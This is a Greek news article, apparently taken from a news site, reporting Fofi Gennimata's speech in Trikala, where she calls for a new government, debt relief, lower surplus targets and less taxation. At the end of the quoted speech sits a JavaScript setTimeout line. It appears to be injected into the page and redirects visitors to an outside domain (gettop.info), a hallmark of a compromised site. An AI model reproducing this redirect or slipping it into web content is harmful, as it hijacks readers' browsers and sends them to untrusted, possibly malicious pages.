Γεννηματά: Η χώρα χρειάζεται μια άλλη κυβέρνηση, μια άλλη πολιτική

0
6

 

Στα Τρίκαλα βρέθηκε η επικεφαλής της Δημοκρατικής Συμπαράταξης και πρόεδρος του ΠΑΣΟΚ Φώφη Γεννηματά απ’ όπου τόνισε πως «η χώρα χρειάζεται μια άλλη κυβέρνηση, μια άλλη πολιτική, χρειάζεται εθνική γραμμή με τρεις στόχους», μιλώντας σε εκπροσώπους των παραγωγικών φορέων της περιοχής.

Σύμφωνα με την κυρία Γεννηματά υάρχουν τρεις στόχοι: «Η επιτάχυνση τολμηρών προοδευτικών μεταρρυθμίσεων, η αναδιάρθρωση και απομείωση του δημόσιου χρέους και η μείωση των στόχων για πρωτογενή πλεονάσματα από το 3,5% στο 2% για τα έτη 2018-2020».

Αναφερόμενη στο θέμα του χρέους, η κ. Γεννηματά επεσήμανε: «Ακόμη όμως και αν η συζήτηση για το χρέος προχωρούσε από μόνη της δεν θα ήταν αρκετή. Γιατί το κλειδί είναι η ανάπτυξη. Είναι η πραγματική οικονομία. Γιατί αν δεν έχουμε ανάπτυξη 2,7% το 2017, θα λειτουργήσει ο «κόφτης» στους μισθούς, στις συντάξεις, θα επιβληθούν νέοι φόροι. Και έτσι αναπαράγεται ο φαύλος κύκλος, το μεγάλο αδιέξοδο».

Τα προβλήματα είναι εδώ, είπε χαρακτηριστικά για να προσθέσει: «Ύφεση, ανεργία, ληξιπρόθεσμα χρέη που ξεπερνούν τα 100 δις ευρώ, απειλή για 18.000 νέα λουκέτα στις επιχειρήσεις. Χιλιάδες άνθρωποι χάνουν καθημερινά τη δουλειά τους και επιχειρήσεις κλείνουν η μία μετά την άλλη. Νέοι φόροι για το 2017 2,5 δις ευρώ. Φόροι παντού. Η μεσαία τάξη λυγίζει από τους φόρους. Η υπερφορολόγηση σκοτώνει την οικονομία. Μοιράζουν την φτώχεια. Τα παίρνουν από τους φτωχούς για να δώσουν ένα μέρος μόνο, στους ακόμη φτωχότερους. Εξίσωση προς τα κάτω. Ισοπέδωση. Αυτό δεν είναι αριστερά». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here